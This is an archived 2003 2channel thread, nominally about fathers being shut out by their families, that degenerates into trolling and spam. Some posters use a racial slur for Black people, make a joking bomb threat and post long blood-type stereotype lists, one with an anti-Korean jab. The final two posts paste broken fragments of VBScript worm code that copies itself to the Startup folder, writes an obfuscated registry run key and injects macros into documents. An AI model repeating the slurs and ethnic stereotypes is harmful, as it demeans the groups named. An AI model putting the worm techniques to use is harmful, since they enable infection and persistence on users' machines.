2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

    家庭内村八分の香具師って   

1 :チャダ ◆PFYaW7Fw3I :03/08/14 13:12
たぶん、パパ、オヤジに多いでしょう

2 :名無しさん@HOME:03/08/14 13:15
22222222222げっつつつつつ

3 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:15
┐( -=・=-д-=・=-) ┌ < いまさら2げと

4 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:15
┐( -=・=-д-=・=-) ┌ 

5 :名無しさん@HOME:03/08/14 13:15
∧弱∧          
(,,*゚o゚*)< ぷぷぷぷぷぷぷぷぷ

6 :名無しさん@HOME:03/08/14 13:16
なるほど

7 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:16
┐( -=・=-д-=・=-) ┌ < ぜんぜんきにしてないぎゃ

8 :チャダ ◆PFYaW7Fw3I :03/08/14 13:18
香具師を気にするわけありませんppp

9 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:18
∧弱∧          
(,,*゚o゚*)< そだね きにしてないね

10 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:18
┐( -=・=-д-=・=-) ┌ < きりかえてちゃださんのおはなしをきくぎゃ

11 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:19
∧弱∧          
(,,*゚o゚*)< みみのあなかっぽじってきくぎゃ

         どぞ〜

12 :チャダ ◆PFYaW7Fw3I :03/08/14 13:22
家庭内別居よりも家庭内村八分の方が絶対ツライはず!

13 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:24
∧弱∧          
(,,*゚o゚*)< ちゃださんはのけものにされてるのきゃ?

14 :チャダ ◆PFYaW7Fw3I :03/08/14 13:27
僕は生活保護を受けてる、自己破産したインド人だよ

15 :名無しさん@HOME:03/08/14 13:27
あ〜あ。
また雑談スレが増えただけか。

16 :名無しさん@HOME:03/08/14 13:28
また、糞スレか


17 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:29
∧弱∧          
(,,*゚o゚*)<>>14 にほんごおじょうずですねだぎゃ

         15さんもちゃださんのそうだんにのってあげてほしいぎゃ


18 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:30
┐( -=・=-д-=・=-) ┌ < ちゃださんはなますてのおにいさんだとおもうぎゃ

19 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:33
∧弱∧          
(,,*゚o゚*)< なりほど・・

20 :チャダ ◆PFYaW7Fw3I :03/08/14 13:33
僕の別名は牛丼委員会会長です。
Bグルにも出入りしてるのでよろしくね(食文化がメインだけど)

21 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:35
┐( -=・=-д-=・=-) ┌ < ちゃださんがうんこかんさいじゃなくてほっとしたぎゃ
              こちらこそよろしくたのむぎゃ

22 :名無しさん@HOME:03/08/14 13:36
パパなのに赤ちゃんにチチを吸わせた香具師って
http://life2.2ch.net/test/read.cgi/baby/1060832990/l50

あちこちに、糞すれたてんな


23 :名無しさん@HOME:03/08/14 13:36
■▲▼
【1:3】      30代のオナニーって    
1 名前:チャダ ◆3mG..rYmi2 03/08/14 13:15 ID:sbvCwICf
30代のオナニーは20代より
テクニック、オカズその他もろもろ含め
自負出来る部分があるはずだ。



お前クソスレばかり立てんな



24 :さくら組@はにゃ―ん ◆ArasuByydk :03/08/14 13:39
チャダ ◆3mG..rYmi2 は監視対象とちて、他の板で犯罪的な書き込みをしたら
通報爆撃を食らわすことに決めたはにゃーん。

25 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:40
┐( -=・=-д-=・=-) ┌ < ちゃださんはいんどじんでひんずーきょうっだからしょうがないぎゃ
             あたまんなかがかーすとせいどだぎゃ

26 :名無しさん@HOME:03/08/14 13:40
やはりここは糞スレなのか・・・

27 :チャダ ◆PFYaW7Fw3I :03/08/14 13:42
あははは、僕は犯罪的な書き込みはしたことないよ(w
僕のスレは日常のトリビア的なものがほとんどさ。

28 :名無しさん@HOME:03/08/14 13:43
「僕」だって
ゲラゲラゲラ!

29 :さくら組@はにゃ―ん ◆ArasuByydk :03/08/14 13:43
漬け物会長もかってはそうだった。。。。。。。。

30 :チャダ ◆PFYaW7Fw3I :03/08/14 13:45
>>28
釣られてる(w

31 :名無しさん@HOME:03/08/14 13:46
「釣られてる(w」だって
ゲラゲラゲラ!

32 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:48
∧弱∧          
(,,*゚o゚*)< どこのくうこうでおりるのきゃ?あらかわりばーきゃ?

33 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:48
ごばくしたぎゃ すまそだぎゃ

34 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:49
┐( -=・=-д-=・=-) ┌ 

35 :名無しさん@HOME:03/08/14 13:49
いなげや

36 :弱酸性 ◆0/p8PH.wuo :03/08/14 13:50
∧弱∧          
(,,*゚o゚*)< 32はがぶちゃんあてだぎゃ

37 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:51
┐( -=・=-д-=・=-) ┌ < 35のいうとおり「はなげやくうこう」だぎゃ
              はやくさーちあんどですとろい!だぎゃ

38 :さくら組@はにゃ―ん ◆ArasuByydk :03/08/14 13:52
↓漬け物会長を通報しまくった糞スレ

手近なコミケを爆破したいと思います。
http://comic.2ch.net/test/read.cgi/cosp/1059838038/

39 :名無しさん@HOME:03/08/14 13:53
下町の某いなげやで犬つれてる人がガブリエルだから
頑張って探しなさい

40 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:53
┐( -=・=-д-=・=-) ┌ < だうんたうんというより
               はーれむだぎゃ

41 :名無しさん@HOME:03/08/14 13:54
ハーレム?
スラムの間違いでしょ?

42 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:54
┐( -=・=-д-=・=-) ┌ < しかしおりらもばかさくらも
              すれちがいのれすばっかしてるぎゃ
              すまそだぎゃ

43 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:55
┐( -=・=-д-=・=-) ┌ < NYでにがーやぷえるとりかんばっかすんでるところを
              はーれむともいうらしいぎゃ

44 :名無しさん@HOME:03/08/14 13:57
>>43
正直そのニガー発言 気に食わん

45 :ガブリエル ◆5SlyEtS7j2 :03/08/14 13:59
┐( -=・=-д-=・=-) ┌ < おりぱてぃすみすすきなんだぎゃ

46 :名無しさん@HOME:03/08/14 14:02
好きでもなんでもいいけど
人を軽蔑する発言は止めたほうが。
ちょっとガブリエルの見方が変わった。

って、2chでこんな事言ってもね(w

47 :名無しさん@HOME:03/08/14 14:03
ニガーはチョコレート色って意味だけ

48 :名無しさん@HOME:03/08/14 14:04
>>47 無知は怖い

49 :ガブリエル ◆5SlyEtS7j2 :03/08/14 14:04
┐( -=・=-д-=・=-) ┌ < んだぎゃ
               おりはにがーのともだちいるぎゃ
              しょせんおりだってきいろいんだからしょうがないぎゃ

50 :名無しさん@HOME:03/08/14 14:04
2chの村八分が集まるスレはここですか?

51 :名無しさん@HOME:03/08/14 14:05
黒人に面と向かって「ニガー」って言ってみそ
ブラックっていえよ

ブラック=ニガーじゃないです

52 :ガブリエル ◆5SlyEtS7j2 :03/08/14 14:07
┐( -=・=-д-=・=-) ┌ < でもさべつっていうのははだのいろだけじゃないんだぎゃ
               くろいひとはかなりびんかんだけど
              それをいったらもっとさべつされてきた
              ぷえるとりかんはどうなるのかとこいちじかんだぎゃ
              やつらはしろいぎゃ
             はだのいろがもとのさべつじゃなくって
             もっとおくふかいものがあるんだとぐこうしてるぎゃ

53 :名無しさん@HOME:03/08/14 14:07
何で差別用語をわざわざ使うかな
ブラックが黒人の正式名称で
イエローは黄色人種の正式名称じゃん

日本人を差別する時 「サタン」って言うよ
髪が黒いから  まじです

54 :ガブリエル ◆5SlyEtS7j2 :03/08/14 14:08
┐( -=・=-д-=・=-) ┌ < ぶらっくっていうのもいやがるぎゃじっさい
              じぶんたちがじぶんをぶらっくていうのはいいみたいだけど
              ひとがいうのはいやみたいだぎゃ

55 :名無しさん@HOME:03/08/14 14:10
>>52
分かってるけど
黒人をニガーって呼ぶのは差別に当たるじゃん
今までの経緯からしてさ
だからそう呼ぶのは止めたらってことが言いたかったんです

56 :名無しさん@HOME:03/08/14 14:11
日本人を差別するときはマンキーです

57 :ガブリエル ◆5SlyEtS7j2 :03/08/14 14:11
┐( -=・=-д-=・=-) ┌ < おなじくろでも
              いんどじんやそのほかのあじあじんは
              おなじくろくても あふりかけいあめりかじんと
             じぶんたちとはめいかくにさべついしきがあるようだぎゃ
             なんでだからわからそだけど

58 :名無しさん@HOME:03/08/14 14:11
  ∧∧
 ξ・_・ξ<ふーーんしらなかったぎゃ

59 :チャダ ◆PFYaW7Fw3I :03/08/14 14:12
インド人をバカにすると、パキスタンといっしょに
爆弾おとすぞ

60 :名無しさん@HOME:03/08/14 14:12
>>54
でもそういわれてもね(w
もう名称がそうなんだから
別に白人ホワイトだって白なわけじゃないし・・・
黄色イエローだって黄なわけじゃ

61 :ガブリエル ◆5SlyEtS7j2 :03/08/14 14:13
┐( -=・=-д-=・=-) ┌ < りあるでいうわけねーぎゃ>55
あんしんしてほしいぎゃ
              ただR&Rにがーってきょくはだいすきだぎゃ

62 :ガブリエル ◆5SlyEtS7j2 :03/08/14 14:14
┐( -=・=-д-=・=-) ┌ < ちゃださんおそいぎゃ
              そんそんすれちがいになってきちゃったぎゃ
              はやくかていないのはぶんちょのはなしに
              きりかえるぎゃ

63 :名無しさん@HOME:03/08/14 14:14
むしろリアルで言って欲しい(ワラ

64 :名無しさん@HOME:03/08/14 14:22
家庭 内村 八分

65 :名無しさん@HOME:03/08/14 14:42
>>59
タイ━━━━||Φ|(|゚|∀|゚|)|Φ||━━━━ホ!!

66 :さくら組@はにゃ―ん ◆ArasuByydk :03/08/14 14:46
>>65
香具師を確実に倒すためには そんなレスじゃだめ。

67 :名無しさん@HOME:03/08/14 15:00

  ぼるじょあ兄弟がムーンウォークで2ゲットォー!!
  ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄
       ∧ ∧     ∧ ∧
       ( ・3メ)    ( ・3・)
      ⊂ ⊂ヽ    / つ つ
        /⌒_)〜(_⌒ヽ
;;⌒´)≡≡≡し´ヽ(     .)ノ `J≡≡≡(´⌒;;
  ;;⌒´)⌒´)         (´⌒(´⌒;;
 ズザザーーーーッ        ズザーーーーッ




68 : ◆PFYaW7Fw3I :03/08/15 07:20


69 :山崎 渉:03/08/15 09:32
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

70 :名無しさん@HOME:03/08/15 09:33
 糞A♂の片棒を担ぐO♀は最低。

<血液型A型の一般的な特徴>(見せかけのもっともらしさ(偽善)に騙されるな!!)
●とにかく神経質で気が小さい、了見が狭い(臆病、二言目には「世間」(「世間」と言っても、一部のA型を中心とした一部の人間の動向に過ぎない))
●他人に異常に干渉して自分たちの古いシキタリを押し付け、そこから少しでも外れる奴に対しては好戦的でファイト満々な態度をとり、かなりキモイ(自己中心、硬直的でデリカシーがない)
●妙に気位が高く、自分が馬鹿にされるとカッと怒るくせに平気で他人を馬鹿にしようとする(ただし、相手を表面的・形式的にしか判断できず(早合点・誤解の名人)、実際にはたいてい、内面的・実質的に負けていることが多い)
●権力・強者には平身低頭だが、弱者に対しては八つ当たり等していじめる(強い者にはへつらい、弱い者に対してはいじめる(人が見ていない場合特に))
●あら探しだけは名人級でウザく、とにかく否定的(例え10の長所があっても褒めることをせず、たった1つの短所を見つけては貶す)
●基本的に悲観主義でマイナス思考に支配されているので性格が鬱陶しい(根暗・陰気)
●何でも「右へ習え」で、単独では何もできない(群れでしか行動できないヘタレ)
●少数派の異質・異文化を理解しようとせず、あるいは理解を示さず、排斥する(差別主義者、狭量、視野が狭い、多数派=正しい と信じて疑わない)
●集団によるいじめのリーダーとなり皆を先導する(陰湿かつ陰険で狡猾)
●他人の悪口・陰口を好むと同時に、自分は他人からどう見られているか、人の目を異常に気にする(自分がそうだから容易に他人を信用できない、またポーズだけで中身を伴っていない、「世間体命」)
●たとえ友達が多くいても、たいていは浅い付き合いでしかなく、心の友はおらず孤独(心の感度が低く、包容力がなく、冷酷だから)
●頭が硬く融通が利かないためストレスを溜め込みやすく、また短気で、地雷持ちが多い(不合理な馬鹿)
●たとえ後で自分の誤りに気づいても、素直に謝れず強引に筋を通そうとし、こじつけの言い訳ばかりする(もう腹を切るしかないだろう!)
●男は、女々しいあるいは女の腐ったみたいな考えのやつが多い(例:「俺のほうが男前やのに、なんでやねん!(あの野郎の足を引っ張ってやる!!)」)


71 :名無しさん@HOME:03/08/17 20:34
FJ66HQ6KEKI

72 :答え:03/08/17 20:37
そうです。

73 : :03/08/18 00:43





74 : ◆PFYaW7Fw3I :03/08/22 19:29
(Д)ヘエー!!

75 :名無しさん@HOME:03/08/22 19:36
B型の特徴
●周りから嫌われてるのにも分からない
●ストレスを溜め込んでは、キレて関係ない人間を巻き添えにして暴れまくる(空気の読めない短気さ)
●自尊心が異常に強く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする(相手を表面的しか見えない)
●他人の忠告を受け入れない、反省できない、自分のやり方が唯一の正答と押し付ける(自分の筋を無理にでも通そうとするため)
●B型の常識はピントがズレまくっている(日本の中でも世界の中でも非常識)
●弱者には威張り散らす(強い者や利用価値ある相手に対してはへりくだり、弱いものに対してはいじめる)
●あら探しだけは名人級(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす。しかも本人のいないとこ
ろで大勢に吹き込む)
●基本的に個人主義で視野が狭いため、性格がうっとうしい(ワンマン)
●へつらう取り巻きを周りに置くのが好き(群れで強引に物事を動かす陰険)
●祖先は半島から来ている
●悪口、陰口が大好き(性格極悪)。口を開くと他人の悪口ばかり。
●少し話してただけで親友あつかい、すこし距離をおこうとすると裏切り扱い
●爪弾きになっていないかいつも気にしている
●案の定、爪弾きになっているのが分からない生まれてから死ぬまで生涯嫌われ者
●当然自分は厚く評価されてるに違いないと、周囲を顧みない(「世論無視」)
●自分の感情をうまく制御できず、討論能力に乏しい(迫力だけで押し通す、あと自分の支持者の言質で)
●頑固で融通(応用)が利かず、表面上意気投合しているようで、腹の中は各自バラバラ(しかも考えていることは驚くほど幼稚)
●自分は常に勝手に振舞っているもんだから、他人と調和をはかる人間を嫌悪し、徒党を組んで猛烈に足を引っ張ろうとする
●嫌いな相手を徹底的に嫌うが周りから徹底的に嫌われてる事を知らない
●おまけに執念深くしつこい

76 :ウインディ ◆KjRBLw7ss2 :03/08/22 20:16
ほう

77 :名無しさん@HOME:03/08/22 20:20
AB型はA型の陰湿さとB型のわがままを兼ね備えた
2重人格の最凶の血液型でつ

でも人数割合が少ないから目立ちません

78 :名無しさん@HOME:03/08/22 20:24
↑O型

79 : ◆PFYaW7Fw3I :03/08/26 12:36


80 :名無しさん@HOME:03/08/26 12:37
O型の特徴もお願いします。

81 :名無しさん@HOME:03/08/26 12:43
O型はいついかなる時もお山の大将です。

82 ::03/08/29 01:03
いちゃったのらー(o^v^o) エヘヘφ(`∇´)φカキコカキコ♪
削除以来、出してくれるよねっ。(*^-^*) お・ね・が・い♪(* ̄・ ̄)ちゅ♪ッ
え?くれないのぉ〜?(;¬_¬)そんなのいやいや〜〜、ガ━━━(゚ロ゚)━━━ン
出してくれなかったら、( `_)乂(_´ ) 勝負! \(^o^)/
☆○(゜ο゜)o パ〜ンチ、☆(゜o(○=(゜ο゜)o バコ〜ン!!( ゚▽゚)=◯)`ν゚)・;'パーンチ
(>_<) いてっ!ダメ!! ゛o(≧◇≦*)oo(*≧◇≦)o″ダメ!!
(☆o☆)きゃ〜〜(@_@;)やられた〜〜(o_ _)o ドテッ ガ━━(゚Д゚;)━━ン!
(+_+) 気絶中。。。。・゚゚・o(iДi)o・゚゚・。うぇぇん <(゜ロ゜;)>ノォオオオオオ!! (゚□゚;ハウッ!
なあんて(#⌒▽⌒#)こんな私っ

83 ::03/08/29 01:34
□□□□■■■■□■■■□□□■■■■□□■■■■■□□□□□□
□□□■■■■□□□□□□□□□□□□□□□■■■■■□□□□□
□□□■■■■□□■■■□□□■■■□□□□■■■■■■□□□□
□□□■■■□□■□□□□□□□□□■□□□□■■■■■□□□□


84 ::03/08/29 01:34


78 名前:名無しさん@HOME :03/08/22 20:24
↑O型




85 ::03/08/29 01:35
しい 

86 ::03/08/29 01:35
エンゲル係数70%以上の家庭●カツカツ●
1 名前:じっと手を見る 03/03/01 13:20
消費支出に占める食費の割合が70%以上の家庭。
どうよ?



26 名前:山崎渉 :03/05/28 15:53
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉


27 名前:名無しさん@HOME :03/06/10 11:20
キャッシングの事

87 :関西君 ◆love.4.x6. :03/08/29 01:36
( −=・=−x−=・=−) < O型ですが、何か??

88 :バンゲリングベイ:03/08/29 02:20

  ヘ⌒ヽフ
 (  ・ω・)  ブタですが 何か?
 (  ⊃旦J旦~
ε| ̄ ̄ ̄ ̄|


89 :名無しさん@HOME:03/09/02 14:04
  ヘ⌒ヽフ
 (  ・ω・)  ブタですが,蟹か?
 (  ⊃旦J旦~
ε| ̄ ̄ ̄ ̄|


90 :名無しさん@HOME:03/09/03 13:21
。。。( ̄ー ̄) ニヤリッ

91 :名無しさん@HOME:03/09/08 23:53
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

92 :名無しさん@HOME:03/09/09 00:46
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)